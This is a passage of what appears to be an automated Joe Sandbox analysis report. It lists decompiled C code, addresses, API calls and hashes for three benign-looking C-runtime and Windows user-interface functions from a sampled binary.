                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Locale$StringUpdateUpdate::____crt$__getptd__getptd_noexit__stricmp_l
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2544346105-0
                                                                                                                                                                                                                                                                                          • Opcode ID: e81381012233a32f466daf1c9effd4de1b6a53fdfbdc6e1d13210bb8a7fa3cdc
                                                                                                                                                                                                                                                                                          • Instruction ID: 35480c1b1e3ccfc34c46965e46aa45f66a9c1ebf9ac5762ed76baf38efee8e22
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e81381012233a32f466daf1c9effd4de1b6a53fdfbdc6e1d13210bb8a7fa3cdc
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67515F70D04689ABDF299BA4C489BBF7BB6AF01324F284199F0E25B1D2D7B08D41DF50
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E0010D63D(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				char _t43;
                                                                                                                                                                                                                                                                                          				char _t46;
                                                                                                                                                                                                                                                                                          				signed int _t53;
                                                                                                                                                                                                                                                                                          				signed int _t54;
                                                                                                                                                                                                                                                                                          				intOrPtr _t56;
                                                                                                                                                                                                                                                                                          				int _t57;
                                                                                                                                                                                                                                                                                          				int _t58;
                                                                                                                                                                                                                                                                                          				char _t59;
                                                                                                                                                                                                                                                                                          				short* _t60;
                                                                                                                                                                                                                                                                                          				int _t65;
                                                                                                                                                                                                                                                                                          				char* _t73;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t73 = _a8;
                                                                                                                                                                                                                                                                                          				if(_t73 == 0 || _a12 == 0) {
                                                                                                                                                                                                                                                                                          					L5:
                                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					if( *_t73 != 0) {
                                                                                                                                                                                                                                                                                          						E001059F5(0,  &_v20, __edi, _a16);
                                                                                                                                                                                                                                                                                          						_t43 = _v20;
                                                                                                                                                                                                                                                                                          						__eflags =  *(_t43 + 0x14);
                                                                                                                                                                                                                                                                                          						if( *(_t43 + 0x14) != 0) {
                                                                                                                                                                                                                                                                                          							_t46 = E0010BB46( *_t73 & 0x000000ff,  &_v20);
                                                                                                                                                                                                                                                                                          							__eflags = _t46;
                                                                                                                                                                                                                                                                                          							if(_t46 == 0) {
                                                                                                                                                                                                                                                                                          								__eflags = _a4;
                                                                                                                                                                                                                                                                                          								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
                                                                                                                                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          									L10:
                                                                                                                                                                                                                                                                                          									__eflags = _v8;
                                                                                                                                                                                                                                                                                          									if(_v8 != 0) {
                                                                                                                                                                                                                                                                                          										_t53 = _v12;
                                                                                                                                                                                                                                                                                          										_t11 = _t53 + 0x70;
                                                                                                                                                                                                                                                                                          										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                                                                                                          										__eflags =  *_t11;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									return 1;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								L21:
                                                                                                                                                                                                                                                                                          								_t54 = E00107A0D(__eflags);
                                                                                                                                                                                                                                                                                          								 *_t54 = 0x2a;
                                                                                                                                                                                                                                                                                          								__eflags = _v8;
                                                                                                                                                                                                                                                                                          								if(_v8 != 0) {
                                                                                                                                                                                                                                                                                          									_t54 = _v12;
                                                                                                                                                                                                                                                                                          									_t33 = _t54 + 0x70;
                                                                                                                                                                                                                                                                                          									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                                                                                                          									__eflags =  *_t33;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								return _t54 | 0xffffffff;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t56 = _v20;
                                                                                                                                                                                                                                                                                          							_t65 =  *(_t56 + 0xac);
                                                                                                                                                                                                                                                                                          							__eflags = _t65 - 1;
                                                                                                                                                                                                                                                                                          							if(_t65 <= 1) {
                                                                                                                                                                                                                                                                                          								L17:
                                                                                                                                                                                                                                                                                          								__eflags = _a12 -  *(_t56 + 0xac);
                                                                                                                                                                                                                                                                                          								if(__eflags < 0) {
                                                                                                                                                                                                                                                                                          									goto L21;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								__eflags = _t73[1];
                                                                                                                                                                                                                                                                                          								if(__eflags == 0) {
                                                                                                                                                                                                                                                                                          									goto L21;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								L19:
                                                                                                                                                                                                                                                                                          								_t57 =  *(_t56 + 0xac);
                                                                                                                                                                                                                                                                                          								__eflags = _v8;
                                                                                                                                                                                                                                                                                          								if(_v8 == 0) {
                                                                                                                                                                                                                                                                                          									return _t57;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                                                                                                          								return _t57;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							__eflags = _a12 - _t65;
                                                                                                                                                                                                                                                                                          							if(_a12 < _t65) {
                                                                                                                                                                                                                                                                                          								goto L17;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							__eflags = _a4;
                                                                                                                                                                                                                                                                                          							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
                                                                                                                                                                                                                                                                                          							__eflags = _t58;
                                                                                                                                                                                                                                                                                          							_t56 = _v20;
                                                                                                                                                                                                                                                                                          							if(_t58 != 0) {
                                                                                                                                                                                                                                                                                          								goto L19;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							goto L17;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t59 = _a4;
                                                                                                                                                                                                                                                                                          						__eflags = _t59;
                                                                                                                                                                                                                                                                                          						if(_t59 != 0) {
                                                                                                                                                                                                                                                                                          							 *_t59 =  *_t73 & 0x000000ff;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						goto L10;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t60 = _a4;
                                                                                                                                                                                                                                                                                          						if(_t60 != 0) {
                                                                                                                                                                                                                                                                                          							 *_t60 = 0;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						goto L5;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}


















                                                                                                                                                                                                                                                                                          0x0010d647
                                                                                                                                                                                                                                                                                          0x0010d64e
                                                                                                                                                                                                                                                                                          0x0010d665
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0010d655
                                                                                                                                                                                                                                                                                          0x0010d657
                                                                                                                                                                                                                                                                                          0x0010d671
                                                                                                                                                                                                                                                                                          0x0010d676
                                                                                                                                                                                                                                                                                          0x0010d679
                                                                                                                                                                                                                                                                                          0x0010d67c
                                                                                                                                                                                                                                                                                          0x0010d6a4
                                                                                                                                                                                                                                                                                          0x0010d6ab
                                                                                                                                                                                                                                                                                          0x0010d6ad
                                                                                                                                                                                                                                                                                          0x0010d72e
                                                                                                                                                                                                                                                                                          0x0010d749
                                                                                                                                                                                                                                                                                          0x0010d74b
                                                                                                                                                                                                                                                                                          0x0010d68b
                                                                                                                                                                                                                                                                                          0x0010d68b
                                                                                                                                                                                                                                                                                          0x0010d68e
                                                                                                                                                                                                                                                                                          0x0010d690
                                                                                                                                                                                                                                                                                          0x0010d693
                                                                                                                                                                                                                                                                                          0x0010d693
                                                                                                                                                                                                                                                                                          0x0010d693
                                                                                                                                                                                                                                                                                          0x0010d693
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0010d699
                                                                                                                                                                                                                                                                                          0x0010d70d
                                                                                                                                                                                                                                                                                          0x0010d70d
                                                                                                                                                                                                                                                                                          0x0010d712
                                                                                                                                                                                                                                                                                          0x0010d718
                                                                                                                                                                                                                                                                                          0x0010d71b
                                                                                                                                                                                                                                                                                          0x0010d71d
                                                                                                                                                                                                                                                                                          0x0010d720
                                                                                                                                                                                                                                                                                          0x0010d720
                                                                                                                                                                                                                                                                                          0x0010d720
                                                                                                                                                                                                                                                                                          0x0010d720
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0010d724
                                                                                                                                                                                                                                                                                          0x0010d6af
                                                                                                                                                                                                                                                                                          0x0010d6b2
                                                                                                                                                                                                                                                                                          0x0010d6b8
                                                                                                                                                                                                                                                                                          0x0010d6bb
                                                                                                                                                                                                                                                                                          0x0010d6e2
                                                                                                                                                                                                                                                                                          0x0010d6e5
                                                                                                                                                                                                                                                                                          0x0010d6eb
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0010d6ed
                                                                                                                                                                                                                                                                                          0x0010d6f0
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0010d6f2
                                                                                                                                                                                                                                                                                          0x0010d6f2
                                                                                                                                                                                                                                                                                          0x0010d6f8
                                                                                                                                                                                                                                                                                          0x0010d6fb
                                                                                                                                                                                                                                                                                          0x0010d66a
                                                                                                                                                                                                                                                                                          0x0010d66a
                                                                                                                                                                                                                                                                                          0x0010d704
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0010d704
                                                                                                                                                                                                                                                                                          0x0010d6bd
                                                                                                                                                                                                                                                                                          0x0010d6c0
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0010d6c4
                                                                                                                                                                                                                                                                                          0x0010d6d5
                                                                                                                                                                                                                                                                                          0x0010d6db
                                                                                                                                                                                                                                                                                          0x0010d6dd
                                                                                                                                                                                                                                                                                          0x0010d6e0
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0010d6e0
                                                                                                                                                                                                                                                                                          0x0010d67e
                                                                                                                                                                                                                                                                                          0x0010d681
                                                                                                                                                                                                                                                                                          0x0010d683
                                                                                                                                                                                                                                                                                          0x0010d688
                                                                                                                                                                                                                                                                                          0x0010d688
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0010d659
                                                                                                                                                                                                                                                                                          0x0010d659
                                                                                                                                                                                                                                                                                          0x0010d65e
                                                                                                                                                                                                                                                                                          0x0010d662
                                                                                                                                                                                                                                                                                          0x0010d662
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0010d65e
                                                                                                                                                                                                                                                                                          0x0010d657

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0010D671
                                                                                                                                                                                                                                                                                          • __isleadbyte_l.LIBCMT ref: 0010D6A4
                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00108355,?,00000000,00000000,?,?,?,?,00108355,00000000), ref: 0010D6D5
                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00108355,00000001,00000000,00000000,?,?,?,?,00108355,00000000), ref: 0010D743
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3058430110-0
                                                                                                                                                                                                                                                                                          • Opcode ID: fb555f904d36f22f589a33711cb5fe66ef35468f43816d86957d216a7c960c2c
                                                                                                                                                                                                                                                                                          • Instruction ID: aceab5c55a078b6bb34784849dcf526828582dd9010847a557f7af685aba5c87
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb555f904d36f22f589a33711cb5fe66ef35468f43816d86957d216a7c960c2c
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C31CD31A00285EFDB21CFA8E881DBA7BB5BF05314F1585A9F4A98B1D1D7B2DD80DB50
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                                                                                                                                          			E000FD300(unsigned int __ecx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				char _v264;
                                                                                                                                                                                                                                                                                          				signed int _t16;
                                                                                                                                                                                                                                                                                          				signed char _t19;
                                                                                                                                                                                                                                                                                          				signed short _t25;
                                                                                                                                                                                                                                                                                          				int _t27;
                                                                                                                                                                                                                                                                                          				intOrPtr _t34;
                                                                                                                                                                                                                                                                                          				signed short _t35;
                                                                                                                                                                                                                                                                                          				void* _t40;
                                                                                                                                                                                                                                                                                          				intOrPtr _t50;
                                                                                                                                                                                                                                                                                          				intOrPtr _t51;
                                                                                                                                                                                                                                                                                          				signed int _t53;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t51 = __esi;
                                                                                                                                                                                                                                                                                          				_t50 = __edi;
                                                                                                                                                                                                                                                                                          				_t35 = __ecx;
                                                                                                                                                                                                                                                                                          				_t16 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_v8 = _t16 ^ _t53;
                                                                                                                                                                                                                                                                                          				_t19 = __ecx >> 0x10;
                                                                                                                                                                                                                                                                                          				_t41 = 0xffff;
                                                                                                                                                                                                                                                                                          				if(_t19 != 0xffff || _a4 != 0) {
                                                                                                                                                                                                                                                                                          					_v264 = 0;
                                                                                                                                                                                                                                                                                          					if((_t19 & 0x00000010) != 0) {
                                                                                                                                                                                                                                                                                          						L19:
                                                                                                                                                                                                                                                                                          						SendMessageA( *(_t50 + 0x28), 0x409, 1, 0);
                                                                                                                                                                                                                                                                                          						_t41 =  &_v264;
                                                                                                                                                                                                                                                                                          						SendMessageA( *(_t50 + 0x28), 0x401, 0x1ff,  &_v264);
                                                                                                                                                                                                                                                                                          						_t51 = _t51;
                                                                                                                                                                                                                                                                                          						goto L20;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t25 = _t35 & 0x0000ffff;
                                                                                                                                                                                                                                                                                          					if(_t35 < 0xf000 || _t35 >= 0xf1f0) {
                                                                                                                                                                                                                                                                                          						if(_t35 < 0xe110 || _t35 > 0xe11f) {
                                                                                                                                                                                                                                                                                          							if(_t35 >= 0xff00 && _t35 <= 0xfffd) {
                                                                                                                                                                                                                                                                                          								_t25 = 0xef1f;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t25 = 0xefda;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t25 = ((_t35 & 0x0000ffff) - 0x0000f000 >> 0x00000004) - 0x00001100 & 0x0000ffff;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t27 = LoadStringA( *0x170c0c, _t25 & 0x0000ffff,  &_v264, 0x100);
                                                                                                                                                                                                                                                                                          					_t40 = 0;
                                                                                                                                                                                                                                                                                          					if(_t27 > 0) {
                                                                                                                                                                                                                                                                                          						while( *((intOrPtr*)(_t53 + _t40 - 0x104)) != 0xa) {
                                                                                                                                                                                                                                                                                          							_t40 = _t40 + 1;
                                                                                                                                                                                                                                                                                          							if(_t40 < _t27) {
                                                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							goto L19;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						 *((char*)(_t53 + _t40 - 0x104)) = 0;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L19;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					SendMessageA( *(__edi + 0x28), 0x409, 0, 0);
                                                                                                                                                                                                                                                                                          					L20:
                                                                                                                                                                                                                                                                                          					return E001059E6(1, _t34, _v8 ^ _t53, _t41, _t50, _t51);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}















                                                                                                                                                                                                                                                                                          0x000fd300
                                                                                                                                                                                                                                                                                          0x000fd300
                                                                                                                                                                                                                                                                                          0x000fd300
                                                                                                                                                                                                                                                                                          0x000fd309
                                                                                                                                                                                                                                                                                          0x000fd310
                                                                                                                                                                                                                                                                                          0x000fd315
                                                                                                                                                                                                                                                                                          0x000fd318
                                                                                                                                                                                                                                                                                          0x000fd320
                                                                                                                                                                                                                                                                                          0x000fd340
                                                                                                                                                                                                                                                                                          0x000fd349
                                                                                                                                                                                                                                                                                          0x000fd3eb
                                                                                                                                                                                                                                                                                          0x000fd3ff
                                                                                                                                                                                                                                                                                          0x000fd404
                                                                                                                                                                                                                                                                                          0x000fd416
                                                                                                                                                                                                                                                                                          0x000fd418
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fd418
                                                                                                                                                                                                                                                                                          0x000fd354
                                                                                                                                                                                                                                                                                          0x000fd35a
                                                                                                                                                                                                                                                                                          0x000fd383
                                                                                                                                                                                                                                                                                          0x000fd39e
                                                                                                                                                                                                                                                                                          0x000fd3aa
                                                                                                                                                                                                                                                                                          0x000fd3aa
                                                                                                                                                                                                                                                                                          0x000fd38f
                                                                                                                                                                                                                                                                                          0x000fd38f
                                                                                                                                                                                                                                                                                          0x000fd38f
                                                                                                                                                                                                                                                                                          0x000fd366
                                                                                                                                                                                                                                                                                          0x000fd376
                                                                                                                                                                                                                                                                                          0x000fd376
                                                                                                                                                                                                                                                                                          0x000fd3c5
                                                                                                                                                                                                                                                                                          0x000fd3cb
                                                                                                                                                                                                                                                                                          0x000fd3cf
                                                                                                                                                                                                                                                                                          0x000fd3d3
                                                                                                                                                                                                                                                                                          0x000fd3dc
                                                                                                                                                                                                                                                                                          0x000fd3df
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fd3e1
                                                                                                                                                                                                                                                                                          0x000fd3e3
                                                                                                                                                                                                                                                                                          0x000fd3e3
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fd328
                                                                                                                                                                                                                                                                                          0x000fd335
                                                                                                                                                                                                                                                                                          0x000fd419
                                                                                                                                                                                                                                                                                          0x000fd42b
                                                                                                                                                                                                                                                                                          0x000fd42b

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000409,00000000,00000000), ref: 000FD335
                                                                                                                                                                                                                                                                                          • LoadStringA.USER32 ref: 000FD3C5
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000409,00000001,00000000), ref: 000FD3FF
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000401,000001FF,00000000), ref: 000FD416
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: MessageSend$LoadString
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 4010343828-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 9d4f62b3bcb62e1e1aa55c586fe4f7917d69c64287ba0c42c049ea6bafcf0249
                                                                                                                                                                                                                                                                                          • Instruction ID: 1ab4efad16f3a7ba72138b313610337bc8f17e1d49a5cd66987c008385e5958a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9d4f62b3bcb62e1e1aa55c586fe4f7917d69c64287ba0c42c049ea6bafcf0249
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4031F57061416E9BEB20A654C885BFA3397DB65300F504076F3829BEC0D5B89A81A752
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                                                                                                                          			E00101030(intOrPtr __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                                          				void* _v28;
                                                                                                                                                                                                                                                                                          				struct tagRECT _v44;
                                                                                                                                                                                                                                                                                          				signed char _v48;
                                                                                                                                                                                                                                                                                          				signed char _v52;
                                                                                                                                                                                                                                                                                          				signed char _v56;
                                                                                                                                                                                                                                                                                          				signed char _v60;
                                                                                                                                                                                                                                                                                          				void* _v64;
                                                                                                                                                                                                                                                                                          				signed char _v68;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t37;
                                                                                                                                                                                                                                                                                          				intOrPtr _t51;
                                                                                                                                                                                                                                                                                          				intOrPtr _t60;
                                                                                                                                                                                                                                                                                          				int _t61;
                                                                                                                                                                                                                                                                                          				signed int _t62;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t60 = __edi;
                                                                                                                                                                                                                                                                                          				_t37 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_t38 = _t37 ^ _t62;
                                                                                                                                                                                                                                                                                          				_v12 = _t37 ^ _t62;
                                                                                                                                                                                                                                                                                          				_t51 = _a4;
                                                                                                                                                                                                                                                                                          				if(_t51 == 0xffffffff) {
                                                                                                                                                                                                                                                                                          					L9:
                                                                                                                                                                                                                                                                                          					return E001059E6(_t38 | 0xffffffff, _t51, _v12 ^ _t62, _t59, _t60, _t61);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_v44.left = 0;
                                                                                                                                                                                                                                                                                          					_v44.top = 0;
                                                                                                                                                                                                                                                                                          					_v44.right = 0;
                                                                                                                                                                                                                                                                                          					_v44.bottom = 0;
                                                                                                                                                                                                                                                                                          					GetClientRect( *(__edi + 4),  &_v44);
                                                                                                                                                                                                                                                                                          					_t59 =  *(__edi + 0x44);
                                                                                                                                                                                                                                                                                          					_t38 = GetMenuItemCount( *(__edi + 0x44));
                                                                                                                                                                                                                                                                                          					_t61 = _t51 + 1;
                                                                                                                                                                                                                                                                                          					_v68 = _t38;
                                                                                                                                                                                                                                                                                          					if(_t61 == _t51) {
                                                                                                                                                                                                                                                                                          						goto L9;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t51 = SendMessageA;
                                                                                                                                                                                                                                                                                          						L3:
                                                                                                                                                                                                                                                                                          						L3:
                                                                                                                                                                                                                                                                                          						if(_t61 >= _v68) {
                                                                                                                                                                                                                                                                                          							_t61 = 0;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_v64 = 0;
                                                                                                                                                                                                                                                                                          						_v60 = 0;
                                                                                                                                                                                                                                                                                          						_v56 = 0;
                                                                                                                                                                                                                                                                                          						_v52 = 0;
                                                                                                                                                                                                                                                                                          						_v48 = 0;
                                                                                                                                                                                                                                                                                          						SendMessageA( *(_t60 + 4), 0x417, _t61,  &_v64);
                                                                                                                                                                                                                                                                                          						_t59 =  &_v28;
                                                                                                                                                                                                                                                                                          						_v28 = 0;
                                                                                                                                                                                                                                                                                          						_v24 = 0;
                                                                                                                                                                                                                                                                                          						_v20 = 0;
                                                                                                                                                                                                                                                                                          						_v16 = 0;
                                                                                                                                                                                                                                                                                          						_t38 = SendMessageA( *(_t60 + 4), 0x41d, _t61,  &_v28);
                                                                                                                                                                                                                                                                                          						if(_v20 > _v44.right) {
                                                                                                                                                                                                                                                                                          							goto L10;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t38 = _v56;
                                                                                                                                                                                                                                                                                          						if((_t38 & 0x00000004) == 0 || (_t38 & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                                          							_t61 = _t61 + 1;
                                                                                                                                                                                                                                                                                          							if(_t61 != _a4) {
                                                                                                                                                                                                                                                                                          								goto L3;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								goto L9;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							L11:
                                                                                                                                                                                                                                                                                          							if(_t61 == _a4) {
                                                                                                                                                                                                                                                                                          								goto L9;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								return E001059E6(_t61, _t51, _v12 ^ _t62, _t59, _t60, _t61);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						goto L13;
                                                                                                                                                                                                                                                                                          						L10:
                                                                                                                                                                                                                                                                                          						_t61 = 0xfffffffe;
                                                                                                                                                                                                                                                                                          						goto L11;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				L13:
                                                                                                                                                                                                                                                                                          			}






















                                                                                                                                                                                                                                                                                          0x00101030
                                                                                                                                                                                                                                                                                          0x00101036
                                                                                                                                                                                                                                                                                          0x0010103b
